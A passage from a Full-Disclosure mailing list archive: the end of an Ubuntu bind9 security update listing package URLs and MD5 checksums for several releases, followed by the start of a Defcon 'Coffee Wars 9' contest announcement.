http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 96684 98747d65d02a685db5256e417a54870b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 568742 d25c28c00bfc48ec52c18a3f5df8339a http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 191858 067227f2f582db56911dbf3236e4aea2 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 97646 ef6f169da9562b22237e6c7a3edbafda http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 112594 cf9a0a5c4a940b4ba2d169c9c081dd9f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 116228 98dd0e9dcf07d0e49f0c4341e775bcf4 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 228496 31efc89af88b933b901d67c61b194ba6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 115168 6797a4d80f8a4196c8a948ad33bc39fe http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 303544 26dd7cd0aaf4712609a619846302ba21 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 184442 7cb775d8fe3051b3ccda2327d1c3083b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 1018542 c0fdcbb4acc613859ce6ab4781762ff7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 95774 5ddb6803f82c9117056a0a5de59aa5d6 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 497640 5d71a76c2185fb7631c07ea415037302 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 175420 a07afa38758a587ed0998b5f78629b3b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 96014 bc47e546be9c1fd6a19e9d8d8366ed3d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 108214 686dd4ad9fb4413b7778786d667428e2 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 112700 86c736ba2fae3f194498d5f3f6de7306 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_i386.deb Size/MD5: 213620 00fa556825d7defaa4fc45cad2138b02 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 118214 4081aec0d3d622fbc05dc097cf102e4f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 324724 09c0e4862ed9691c2527f755683a8b8c http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 194978 b5f813766584254fd824e72baeffc96b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 1169812 34192103d6041b6f50e7dd6551a6dbf1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 98074 06572e8c43b6eeeeba3352ba3b94ce65 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 511582 21cc7a4347b3bb863a7151ad5cf73bd1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 183468 5844029a87c42bc54a547acaff985442 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 98738 2eed8603e4ba78e0b07e4e21df59e93d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 112116 a8f232fa8d8ab6429c57827ca1af13bc http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 115894 193a734032dcdbb289fbddb68cb350b5 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_powerpc.deb Size/MD5: 218796 cdc6ccf2614a684ecff0f63f9f96dfe1 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 117664 48cc134e0194e3d732e79ca699f8406b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 315270 7bc67be9266eaddfc64138c6c01483bc http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 191400 bc4b1922d10028421b14b69bf9d76bb7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 1141834 af414f9bcf9c42d1e52fe8b2069fc83d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 96070 43a9988edc73a9b4fd2ad6e98338a8fc http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 513792 55b3d92618f678690e91956b131fa330 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 180638 b24a1a0d2d50b9d2fcba45971d23a7a4 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 96248 425e3657f29e865c91be421484089106 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 109716 cddb416bc557fb9cdebc6372312c4350 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 113516 a102110917b6ec739fa2035e1f65e4a6 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_sparc.deb Size/MD5: 220226 b855b98a0ebde055930e560feec2a3c0 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2.diff.gz Size/MD5: 300771 40cda1f019e548208ef85f9dad5dfeec http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2.dsc Size/MD5: 1001 e1318d3386a5d798b700b6d8ed108146 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1.orig.tar.gz Size/MD5: 4987098 683293e3acc85e30f5ca4bba8a096303 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.4.1-P1-3ubuntu2_all.deb Size/MD5: 233584 955901705316670276f41c633020a274 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 46106 8d04ee50411a1d62391209b8ccab5dfd http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 278364 1f2de92494c8a7b5e93a53c75cffbb44 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 117148 927ff60a9de441ef3b1a86337c8756a1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 1162042 2d7d3e28b6e8422abc7cdfc41f046c73 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 26006 be5c5f455a5507b9e14b8678dac0f6bb http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 552146 97272ff611d594b7346086268e4765ae http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 130934 4135eb09ffb1df2611dc809a682c74df http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 23180 a6afe8f12bf054deca547c2f72d55a66 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 42424 96a32f1fa3f81841fe7085bb01247f6d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 41990 c90cb0cac5341fb94c7c959983350dd9 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_amd64.deb Size/MD5: 167296 61645dfcde5c7543d150d829ed113b0d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 42116 2701dd72510ac551881624a6931069ec http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 254750 1300e37afb8268b112ab1718e998d443 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 106990 717db0ad88486bd34c79120f00e02551 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 1040234 db9099b5ac165aaaf6220317d054df8c http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 24768 7b5c03984b957dafa6b4bcd981c5af9f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 470404 6a7d265fd0aba23035df443e8b78269b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 113492 685a3b04a9581c29466b67fef742674d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 21570 23a9a67e65a5e2f8dfb836aba5b0ece5 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 36630 cbfc768cbeceb42d104f41307f720688 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 38268 8d71f0b2df12a449fa7c3fd7613ff682 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_i386.deb Size/MD5: 150304 f9c7b0ee3d4891b06ef4271c62c292d4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 41828 101a835923e507c0eea60ff08663b1a9 http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 250104 87f9678cd733aacc482b1cd7705a820d http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 105740 c5035426f0bf196ad4f34d320e9126a5 http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 1025798 47551ddfeb321fd6ff69805bd3c72cf7 http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 24354 9c8a3f39052994adeb0e1277eb9c96d6 http://ports.ubuntu.com/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 449848 d70baaa8ab74b607cc20ac8befd935b3 http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 108538 e64e03f6db0678366f5ed7931bbb7bd8 http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 20936 c735ba0c832279b708b38dd995f90eea http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 35840 6e09afe7daabc2722145eae0ccf64ebb http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 36964 7cf9822533618d4eeaaaaca191081a10 http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_lpia.deb Size/MD5: 146046 3e90eb9276c3c9cd29722b58b44825d6 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 45228 6f58fdfb1a9464505b63d6ee10bfb499 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 279194 7fb180ca0c0fb2197b6cabcb9e5b87c1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 117336 4a6d45d30c6dfd9b7525e9efeb7cc390 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 1209208 c23a85c019b655f9044207a98c9eb472 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 27166 92bd4c64f9914f63fc59973bc0e73d6d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 485638 3c3bff7bcd7df84170d9f45855785f46 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 121410 6eb18c5fee8ef25bfaab05b53a6776d1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 24308 94df6003c7e061d9a1e1cbcc1ed1133d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 41128 a78b1e2958a2cda0347824e2d9eb7815 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 41354 d826c2e80c70c92c54c407fa6458a2d0 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_powerpc.deb Size/MD5: 156660 24840c4483eb81fccfd483843c03fc21 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 44760 ff76458f2f3bc437f975710f0f44350f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 267886 15ae5b64e2d7f0a84610dca3265f36fe http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 114014 18755ede3d638c17c7292bbc0d0b331c http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 1180276 a906d2e8f9b40766735895725112fe04 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 25350 e9e7f9b9c5fc4b6bcaad7e36b7a12c21 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 492286 e367b633343c1841f48eeec01f08e494 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 117916 bee4cf76d903bf902a025ea2362cf5ec http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 21900 0807caba04fee218b416288eae034b93 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 38438 e11c657acb477041666dd3cccd8bfebc http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 39244 da7d911f9a2f97fd6e895736489c22ac http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_sparc.deb Size/MD5: 156818 cada78841afbf1e0caf13f75eadaba51 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1.diff.gz Size/MD5: 243611 da5389b9c001fc8105edd135c086b13d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1.dsc Size/MD5: 998 2588a42ba49dd2702130d159c1f68d6d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2.orig.tar.gz Size/MD5: 5021880 0aa73c66c206de3da10029bf5f195347 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.4.2-10ubuntu0.1_all.deb Size/MD5: 239534 7469deb007e19439a8f5df6a53ecd485 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 47052 24ce8ff319d3a45dc8c572df3bc47ef6 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 282744 5d77a9de6d4267405c6c969792a42243 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 116814 2adb81fed8e7d93cfde2ab01f1050d2e http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 1188376 36c0b944f5e23f76ba587e756e7c4bdb http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 27208 be7b3257b0eb9014f033b4ead73bb7a7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 550042 268c59c90f72e47690a2f64fccc296c6 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 138186 5f08619b4b4198fb6176f4d914e74b54 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 24666 f584f72af33412695ab6cfb81c891ee4 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 44570 f63b6e57da24654d0ffc243936a5a153 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 42802 4542b6bea7110e1cbf557346fc5536ad http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_amd64.deb Size/MD5: 171006 c96cfef97c3950ab59b80a7b1d3aa868 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 44692 62a8e406937a5be466977c5b47f9a659 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 267508 da18e50b8467dbd7730640a09c52d188 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 110460 480313c340c47e5d6f5167c11161daa7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 1065190 6fe78d85bdae7a9970c769dd2d1ebdcf http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 27254 2ba88324a0225ccab2b826dcc2f0f202 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 493370 5916fe8f22b1a19d0dde5f9e9596353f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 125982 26501d011be6c34b7874b19ceabd0148 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 22852 13693beb84952c55cf78f4275c39aba7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 38258 34107c4916cb13ac651d16706e9d9b9a http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 40058 443bc171d30e2f262bb8ce2e3bfe885e http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_i386.deb Size/MD5: 159118 b31758442a36011d79dde9c485fca1da lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 45254 659ea8656a46bc1265f0bf3049ffc511 http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 267536 13c20e925a9a9ae1353b63fde5ce8555 http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 111858 ce4c215e0dfc3a4c1e53b431264becf7 http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 1068570 9680708be2a7840be99f2894234757bf http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 27248 f0a51f7ebaeb86afa2f466c1e4b1b4c0 http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 488706 325b144544a6dfd1917210c9a02ec423 http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 122606 316c7a93002a350fa04f7956483c6efe http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 22522 66d3aaa993507238b341578bb534a0aa http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 37670 b58cc5a2d27f02cac5b954cf4cb1cec5 http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 39810 6a5c7b4e2a52a61258d86618f3a27106 http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_lpia.deb Size/MD5: 158506 b2064557c74e536b96d77a707068c933 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 49064 77fb0a3b0c381e9f4cf561240f801e99 http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 297108 927db70c3f13cb7642f8e9dfe9d2e378 http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 124214 fb0b53b2b7f5fd750c3ee3785038efea http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 1271364 32f252c1f510f5d0f5f2860a75fccf8b http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 29764 2111df6f219f9e4a421329209eee6489 http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 529240 e66e625de5160092f4ac4b9b505bd3ae http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 137960 e581851a0e71ada301415c006e5697d9 http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 26412 12e5213a39740e05cdf4ed87dbfd055e http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 43508 b8aab766d691b13f0df8796252bfe7a5 http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 44292 78170e54852c2e28718dd26c72148165 http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_powerpc.deb Size/MD5: 171502 0c747e830656e34d4cd5b84f8ee38551 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 46786 2f07cd43ef71146ec839172a9318eb22 http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 281936 b97f8461fb12702ffde3b1536e11531c http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 116124 cf6ec9328492c928d5d8064f09d5bcda http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 1178958 f21fed7bb01a12a74061b3cf03000b54 http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 26652 b650866c75829e84f35592fff5d6c950 http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 500058 d99f74a53d5b2b6167eae4bd9f56d3ed http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 127824 c93136898c8ce5f8ac90ba46daacc015 http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 22688 e69b52b3505b614f95836502f06bd1ac http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 38792 3167cb62f05d65b3971cc90f1093cd6a http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 38984 92a1a25f10ed41b0bd3a25699e5d76ff http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 169952 3656ebd36bb152e7e18c984f0d8a31fe -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080708/52627f45/attachment.bin From foofus at foofus.net Tue Jul 8 22:44:27 2008 From: foofus at foofus.net (foofus at foofus.net) Date: Tue, 8 Jul 2008 14:44:27 -0700 (PDT) Subject: [Full-disclosure] Coffee Wars 9 : Call for Beans Message-ID: <33916.209.59.46.11.1215553467.squirrel@webmail.foofus.net> In addition to whatever other insanity flourishes at Defcon each year, the last eight years have been witness to the amazing and ridiculous contest known as CoffeeWars. This single ludicrous event is really two contests. The first, and most important, is the attempt to select the finest coffee from all of hacker culture. The second is the loopy part: to find the upper limit on how much coffee the staff can drink. Every year, we succeed at the first task. Every year, we fail at the second. Here is a useful list of key factors contributing to the outbreak of coffee wars throughout history: 1 - because the Kona/JBM debate had to be settled 2 - because once was not enough 3 - because we went a little crazy 4 - because people responded to our brand of crazy 5 - because it is now an institution 6 - because we're actually getting good at running it 7 - because each year the competition gets more intense 8 - because of popular demand 9 - because you haven't yet had a chance to test your beans What's that, you say? You only recall eight coffee wars? And the list mentions a ninth? Very attentive of you, dear reader. The ninth coffee war will take place exactly when you would expect: on Friday, 8 Aug 2008, at the Riviera, at the 